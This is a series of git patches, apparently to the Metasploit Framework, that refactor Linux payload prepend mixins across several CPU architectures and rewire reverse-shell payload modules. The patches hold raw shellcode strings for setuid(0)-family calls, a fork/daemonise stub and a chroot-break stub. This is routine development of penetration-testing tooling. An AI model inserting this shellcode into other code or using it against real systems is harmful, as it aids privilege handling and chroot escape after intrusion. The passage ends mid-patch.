include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 42777fbcb06e..38b79f0110ac 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 183 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) From 4d304c65b5981542bfd41c8dd2c8a2c163bec509 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 04:15:41 -0500 Subject: [PATCH 03/12] fix: remove x64 directory flatting in Linux payloads --- .../payload/linux/x64/{reverse_sctp_x64.rb => reverse_sctp.rb} | 2 +- .../payload/linux/x64/{reverse_tcp_x64.rb => reverse_tcp.rb} | 2 +- lib/msf_autoload.rb | 2 +- modules/payloads/stagers/linux/x64/reverse_sctp.rb | 2 +- modules/payloads/stagers/linux/x64/reverse_tcp.rb | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) rename lib/msf/core/payload/linux/x64/{reverse_sctp_x64.rb => reverse_sctp.rb} (99%) rename lib/msf/core/payload/linux/x64/{reverse_tcp_x64.rb => reverse_tcp.rb} (99%) diff --git a/lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb b/lib/msf/core/payload/linux/x64/reverse_sctp.rb similarity index 99% rename from lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb rename to lib/msf/core/payload/linux/x64/reverse_sctp.rb index 6df4a3fc2d48..1229fe5610b5 100644 --- a/lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb +++ b/lib/msf/core/payload/linux/x64/reverse_sctp.rb @@ -9,7 +9,7 @@ module Msf # ### -module Payload::Linux::ReverseSctp_x64 +module Payload::Linux::X64::ReverseSctp include Msf::Payload::TransportConfig include Msf::Payload::Linux diff --git a/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb b/lib/msf/core/payload/linux/x64/reverse_tcp.rb similarity index 99% rename from lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb rename to lib/msf/core/payload/linux/x64/reverse_tcp.rb index 4bc5b6eb7502..67d94505c583 100644 --- a/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb +++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb @@ -9,7 +9,7 @@ module Msf # ### -module Payload::Linux::ReverseTcp_x64 +module Payload::Linux::X64::ReverseTcp include Msf::Payload::TransportConfig include Msf::Payload::Linux diff --git a/lib/msf_autoload.rb b/lib/msf_autoload.rb index c546aa8dc195..f192e2926431 100644 --- a/lib/msf_autoload.rb +++ b/lib/msf_autoload.rb @@ -75,7 +75,7 @@ def collapse_list "#{__dir__}/msf/core/rpc/v10", "#{__dir__}/msf/core/payload/osx/x64", "#{__dir__}/msf/core/payload/windows/x64", - "#{__dir__}/msf/core/payload/linux/x64", + # "#{__dir__}/msf/core/payload/linux/x64", "#{__dir__}/msf/core/web_services/servlet", "#{__dir__}/msf/base", "#{__dir__}/rex/parser/fs" diff --git a/modules/payloads/stagers/linux/x64/reverse_sctp.rb b/modules/payloads/stagers/linux/x64/reverse_sctp.rb index 67f2d913b59a..62b78cf2bde9 100644 --- a/modules/payloads/stagers/linux/x64/reverse_sctp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_sctp.rb @@ -7,7 +7,7 @@ module MetasploitModule CachedSize = 136 include Msf::Payload::Stager - include Msf::Payload::Linux::ReverseSctp_x64 + include Msf::Payload::Linux::X64::ReverseSctp def initialize(info = {}) super( diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index 31c4440c3b0d..5a56e82cfcd0 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 130 include Msf::Payload::Stager - include Msf::Payload::Linux::ReverseTcp_x64 + include Msf::Payload::Linux::X64::ReverseTcp def initialize(info = {}) super(merge_info(info, From 647972b7c8f50de2d3e36bc6d5f447117ab1131f Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 08:13:09 -0500 Subject: [PATCH 04/12] feat: add PrependSetuid for linux/aarch64 --- .../core/payload/linux/aarch64/prepends.rb | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 lib/msf/core/payload/linux/aarch64/prepends.rb diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb new file mode 100644 index 000000000000..22778dcbd7ac --- /dev/null +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb @@ -0,0 +1,29 @@ +module Msf + module Payload::Linux::Aarch64::Prepends + include Msf::Payload::Linux::Prepends + + def prepends_order + %w[PrependSetuid] + end + + def appends_order + %w[] + end + + def prepends_map + { + # 'PrependFork' => "", + + # setuid(0) + 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\x48\x12\x80\xd2" + # mov x8, #0x92 + "\x01\x00\x00\xd4" # svc 0x0 + + } + end + + def appends_map + {} + end + end +end \ No newline at end of file From 30e13c9040abaacf587e6fdcfea01ecd5df6c2c9 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 08:13:52 -0500 Subject: [PATCH 05/12] fix: fix mismatch between prepend name and stub in linux/armle --- lib/msf/core/payload/linux/armle/prepends.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/payload/linux/armle/prepends.rb b/lib/msf/core/payload/linux/armle/prepends.rb index 90612a220791..7fb9557a4726 100644 --- a/lib/msf/core/payload/linux/armle/prepends.rb +++ b/lib/msf/core/payload/linux/armle/prepends.rb @@ -14,17 +14,18 @@ def prepends_map { # 'PrependFork' => "", - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + # + # setuid(0) + 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # "\x17\x70\xa0\xe3" + # mov r7, #23 # "\x00\x00\x00\xef", # svc # - # setuid(0) - 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # - "\x01\x10\x21\xe0" + # eor r1, r1, r1 # - "\x02\x20\x22\xe0" + # eor r2, r2, r2 # - "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # - "\x00\x00\x00\xef" # svc # + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x01\x10\x21\xe0" + # eor r1, r1, r1 # + "\x02\x20\x22\xe0" + # eor r2, r2, r2 # + "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # + "\x00\x00\x00\xef" # svc # } end From aca6613a3e414b7c9c2be3c4ac44d68d7aa37765 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 09:44:39 -0500 Subject: [PATCH 06/12] feat: add PrependSetreuid for linux/aarch64 --- lib/msf/core/payload/linux/aarch64/prepends.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb index 22778dcbd7ac..58b00eaec44d 100644 --- a/lib/msf/core/payload/linux/aarch64/prepends.rb +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb @@ -17,8 +17,13 @@ def prepends_map # setuid(0) 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr "\x48\x12\x80\xd2" + # mov x8, #0x92 - "\x01\x00\x00\xd4" # svc 0x0 + "\x01\x00\x00\xd4", # svc 0x0 + # setreuid(0, 0) + 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\x28\x12\x80\xd2" + # mov x8, #0x91 + "\x01\x00\x00\xd4" # svc 0x0 } end From ead6af8cbc720936506ecd6a5393293054dc75d8 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 10:16:46 -0500 Subject: [PATCH 07/12] feat: add PrependSetresuid for linux/aarch64 --- lib/msf/core/payload/linux/aarch64/prepends.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb index 58b00eaec44d..93befcc45883 100644 --- a/lib/msf/core/payload/linux/aarch64/prepends.rb +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb @@ -3,7 +3,7 @@ module Payload::Linux::Aarch64::Prepends include Msf::Payload::Linux::Prepends def prepends_order - %w[PrependSetuid] + %w[ PrependSetresuid PrependSetreuid PrependSetuid] end def appends_order @@ -20,10 +20,17 @@ def prepends_map "\x01\x00\x00\xd4", # svc 0x0 # setreuid(0, 0) - 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\xe1\x03\x1f\xaa" + # mov x1, xzr - "\x28\x12\x80\xd2" + # mov x8, #0x91 - "\x01\x00\x00\xd4" # svc 0x0 + 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\x28\x12\x80\xd2" + # mov x8, #0x91 + "\x01\x00\x00\xd4", # svc 0x0 + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\xe2\x03\x1f\xaa" + # mov x2, xzr + "\x68\x12\x80\xd2" + # mov x8, #0x93 + "\x01\x00\x00\xd4" # svc 0x0 } end From a27024eb1fc4cde474f2eb21b5684a4bdc645717 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 20 Dec 2024 10:18:25 -0500 Subject: [PATCH 08/12] fix: updating aarch64/shell to use the new prepends mixin --- modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb index a15bef0f47d5..367d2d4a3d66 100644 --- a/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 152 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Aarch64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) From edf4fca47626c99d7031c9625515c12f07ff059e Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 10 Jan 2025 07:34:59 -0500 Subject: [PATCH 09/12] chore: rubocop format fix --- .../core/payload/linux/aarch64/prepends.rb | 67 ++--- lib/msf/core/payload/linux/armle/prepends.rb | 59 ++--- lib/msf/core/payload/linux/ppc/prepends.rb | 123 ++++----- lib/msf/core/payload/linux/prepends.rb | 77 +++--- lib/msf/core/payload/linux/x64/prepends.rb | 238 +++++++++--------- lib/msf/core/payload/linux/x86/prepends.rb | 213 ++++++++-------- 6 files changed, 391 insertions(+), 386 deletions(-) diff --git a/lib/msf/core/payload/linux/aarch64/prepends.rb b/lib/msf/core/payload/linux/aarch64/prepends.rb index 93befcc45883..e03ad3422b26 100644 --- a/lib/msf/core/payload/linux/aarch64/prepends.rb +++ b/lib/msf/core/payload/linux/aarch64/prepends.rb @@ -1,41 +1,42 @@ -module Msf - module Payload::Linux::Aarch64::Prepends - include Msf::Payload::Linux::Prepends +# +# Linux aarch64 prepends +# +module Msf::Payload::Linux::Aarch64::Prepends + include Msf::Payload::Linux::Prepends - def prepends_order - %w[ PrependSetresuid PrependSetreuid PrependSetuid] - end + def prepends_order + %w[PrependSetresuid PrependSetreuid PrependSetuid] + end - def appends_order - %w[] - end + def appends_order + %w[] + end - def prepends_map - { - # 'PrependFork' => "", + def prepends_map + { + # 'PrependFork' => "", - # setuid(0) - 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\x48\x12\x80\xd2" + # mov x8, #0x92 - "\x01\x00\x00\xd4", # svc 0x0 + # setuid(0) + 'PrependSetuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\x48\x12\x80\xd2" + # mov x8, #0x92 + "\x01\x00\x00\xd4", # svc 0x0 - # setreuid(0, 0) - 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\xe1\x03\x1f\xaa" + # mov x1, xzr - "\x28\x12\x80\xd2" + # mov x8, #0x91 - "\x01\x00\x00\xd4", # svc 0x0 + # setreuid(0, 0) + 'PrependSetreuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\x28\x12\x80\xd2" + # mov x8, #0x91 + "\x01\x00\x00\xd4", # svc 0x0 - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr - "\xe1\x03\x1f\xaa" + # mov x1, xzr - "\xe2\x03\x1f\xaa" + # mov x2, xzr - "\x68\x12\x80\xd2" + # mov x8, #0x93 - "\x01\x00\x00\xd4" # svc 0x0 - } - end + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\xe0\x03\x1f\xaa" + # mov x0, xzr + "\xe1\x03\x1f\xaa" + # mov x1, xzr + "\xe2\x03\x1f\xaa" + # mov x2, xzr + "\x68\x12\x80\xd2" + # mov x8, #0x93 + "\x01\x00\x00\xd4" # svc 0x0 + } + end - def appends_map - {} - end + def appends_map + {} end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/armle/prepends.rb b/lib/msf/core/payload/linux/armle/prepends.rb index 7fb9557a4726..2e89f6c428fe 100644 --- a/lib/msf/core/payload/linux/armle/prepends.rb +++ b/lib/msf/core/payload/linux/armle/prepends.rb @@ -1,36 +1,37 @@ -module Msf - module Payload::Linux::Armle::Prepends - include Msf::Payload::Linux::Prepends +# +# Linux armle prepends +# +module Msf::Payload::Linux::Armle::Prepends + include Msf::Payload::Linux::Prepends - def prepends_order - %w[PrependSetresuid PrependSetuid] - end + def prepends_order + %w[PrependSetresuid PrependSetuid] + end - def appends_order - %w[] - end + def appends_order + %w[] + end - def prepends_map - { - # 'PrependFork' => "", + def prepends_map + { + # 'PrependFork' => "", - # - # setuid(0) - 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # - "\x17\x70\xa0\xe3" + # mov r7, #23 # - "\x00\x00\x00\xef", # svc # + # + # setuid(0) + 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x17\x70\xa0\xe3" + # mov r7, #23 # + "\x00\x00\x00\xef", # svc # - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # - "\x01\x10\x21\xe0" + # eor r1, r1, r1 # - "\x02\x20\x22\xe0" + # eor r2, r2, r2 # - "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # - "\x00\x00\x00\xef" # svc # - } - end + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x01\x10\x21\xe0" + # eor r1, r1, r1 # + "\x02\x20\x22\xe0" + # eor r2, r2, r2 # + "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # + "\x00\x00\x00\xef" # svc # + } + end - def appends_map - {} - end + def appends_map + {} end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/ppc/prepends.rb b/lib/msf/core/payload/linux/ppc/prepends.rb index 9379735f036d..0ea73cf42c64 100644 --- a/lib/msf/core/payload/linux/ppc/prepends.rb +++ b/lib/msf/core/payload/linux/ppc/prepends.rb @@ -1,74 +1,75 @@ -module Msf - module Payload::Linux::Ppc::Prepends - include Msf::Payload::Linux::Prepends +# +# Linux ppc prepends +# +module Msf::Payload::Linux::Ppc::Prepends + include Msf::Payload::Linux::Prepends - def prepends_order - %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid] - end + def prepends_order + %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid] + end + + def appends_order + %w[AppendExit] + end - def appends_order - %w[AppendExit] - end + def prepends_map + { + # 'PrependFork' => "", - def prepends_map - { - # 'PrependFork' => "", + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # + "\x44\xff\xff\x02", # sc # - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # - "\x44\xff\xff\x02", # sc # + # setreuid(0, 0) + 'PrependSetreuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # + "\x44\xff\xff\x02", # sc # - # setreuid(0, 0) - 'PrependSetreuid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # - "\x44\xff\xff\x02", # sc # + # setuid(0) + 'PrependSetuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # + "\x44\xff\xff\x02", # sc # - # setuid(0) - 'PrependSetuid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # - "\x44\xff\xff\x02", # sc # + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # + "\x44\xff\xff\x02", # sc # - # setresgid(0, 0, 0) - 'PrependSetresgid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # - "\x44\xff\xff\x02", # sc # + # setregid(0, 0) + 'PrependSetregid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # + "\x44\xff\xff\x02", # sc # - # setregid(0, 0) - 'PrependSetregid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # - "\x44\xff\xff\x02", # sc # + # setgid(0) + 'PrependSetgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # + "\x44\xff\xff\x02" # sc # - # setgid(0) - 'PrependSetgid' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # - "\x44\xff\xff\x02" # sc # - # setreuid(0, 0) = break chroot - # 'PrependChrootBreak' => - } - end + # 'PrependChrootBreak' => + } + end - def appends_map - { + def appends_map + { # exit(0) - 'AppendExit' => "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # - "\x44\xff\xff\x02" # sc # - } - end + 'AppendExit' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # + "\x44\xff\xff\x02" # sc # + } end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/prepends.rb b/lib/msf/core/payload/linux/prepends.rb index 05c9e658fe2a..a20a120ae362 100644 --- a/lib/msf/core/payload/linux/prepends.rb +++ b/lib/msf/core/payload/linux/prepends.rb @@ -1,46 +1,45 @@ +# +# Linux Preprends shared logic. +# +module Msf::Payload::Linux::Prepends + def initialize(info) + super(info) + register_prepend_options + end -module Msf - module Payload::Linux::Prepends - - def initialize(info) - super(info) - register_prepend_options + def register_prepend_options + all_options = { + 'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'], + 'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'], + 'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'], + 'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'], + 'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 'false'], + 'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'], + 'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'], + 'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'], + 'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'] + } + avaiable_options = [] + for prepend in prepends_order + avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend))) end - - def register_prepend_options - all_options = { - 'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'], - 'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'], - 'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'], - 'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'], - 'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 'false'], - 'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'], - 'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'], - 'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'], - 'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'] - } - avaiable_options = [] - for prepend in prepends_order - avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend))) - end - for append in appends_order - avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append))) - end - register_advanced_options(avaiable_options, Msf::Payload::Linux) + for append in appends_order + avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append))) end + register_advanced_options(avaiable_options, Msf::Payload::Linux) + end - def apply_prepends(buf) - pre = '' - app = '' - for name in prepends_order.each - pre << prepends_map.fetch(name) if datastore[name] - end - for name in appends_order.each - app << appends_map.fetch(name) if datastore[name] - end - pre.force_encoding('ASCII-8BIT') + - buf.force_encoding('ASCII-8BIT') + - app.force_encoding('ASCII-8BIT') + def apply_prepends(buf) + pre = '' + app = '' + for name in prepends_order.each + pre << prepends_map.fetch(name) if datastore[name] + end + for name in appends_order.each + app << appends_map.fetch(name) if datastore[name] end + pre.force_encoding('ASCII-8BIT') + + buf.force_encoding('ASCII-8BIT') + + app.force_encoding('ASCII-8BIT') end end diff --git a/lib/msf/core/payload/linux/x64/prepends.rb b/lib/msf/core/payload/linux/x64/prepends.rb index 8a1ae58a467a..bffc48ba48fd 100644 --- a/lib/msf/core/payload/linux/x64/prepends.rb +++ b/lib/msf/core/payload/linux/x64/prepends.rb @@ -1,130 +1,132 @@ -module Msf - module Payload::Linux::X64::Prepends - include Msf::Payload::Linux::Prepends - def prepends_order - %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid] - end - - def appends_order - %w[] - end - - def prepends_map - { 'PrependFork' => "\x6a\x39" + # push 57 ; __NR_fork # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - "\x48\x85\xc0" + # test rax,rax # - "\x74\x08" + # jz loc_0012 # - # loc_000a: # - "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x3c" + # push 60 ; __NR_exit # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - # loc_0012: # - "\x04\x70" + # add al, 112 ; __NR_setsid # - "\x0f\x05" + # syscall # - "\x6a\x39" + # push 57 ; __NR_fork # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - "\x48\x85\xc0" + # test rax,rax # - "\x75\xea", # jnz loc_000a # +# +# Linux x64 Prepends file +# +module Msf::Payload::Linux::X64::Prepends + include Msf::Payload::Linux::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid] + end + + def appends_order + %w[] + end - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x6a\x75" + # push 0x75 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + def prepends_map + { + 'PrependFork' => "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x74\x08" + # jz loc_0012 # + # loc_000a: # + "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 60 ; __NR_exit # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + # loc_0012: # + "\x04\x70" + # add al, 112 ; __NR_setsid # + "\x0f\x05" + # syscall # + "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x75\xea", # jnz loc_000a # - # setreuid(0, 0) - 'PrependSetreuid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x48\x89\xf2" + # mov rdx,rsi # - "\x6a\x71" + # push 0x71 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x75" + # push 0x75 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setuid(0) - 'PrependSetuid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x69" + # push 0x69 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setreuid(0, 0) + 'PrependSetreuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x71" + # push 0x71 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setresgid(0, 0, 0) - 'PrependSetresgid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x6a\x77" + # push 0x77 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setuid(0) + 'PrependSetuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x69" + # push 0x69 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setregid(0, 0) - 'PrependSetregid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x48\x89\xf2" + # mov rdx,rsi # - "\x6a\x72" + # push 0x72 # - "\x58" + # pop rax # - "\x0f\x05", # syscall # + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x77" + # push 0x77 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # setgid(0) - 'PrependSetgid' => "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x6a" + # push 0x6a # - "\x58" + # pop rax # - "\x0f\x05", # syscall # - - # setreuid(0, 0) + break chroot - 'PrependChrootBreak' => "\x48\x31\xff" + # xor rdi,rdi # - "\x48\x89\xfe" + # mov rsi,rdi # - "\x48\x89\xf8" + # mov rax,rdi # - "\xb0\x71" + # mov al,0x71 # - "\x0f\x05" + # syscall # - # generate temp dir name - "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + # mov rdi, # - "\x56" + # push rsi # - "\x57" + # push rdi # - # mkdir(random,0755) - "\x48\x89\xe7" + # mov rdi,rsp # - "\x66\xbe\xed\x01" + # mov si,0755 # - "\x6a\x53" + # push 0x53 # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # + # setregid(0, 0) + 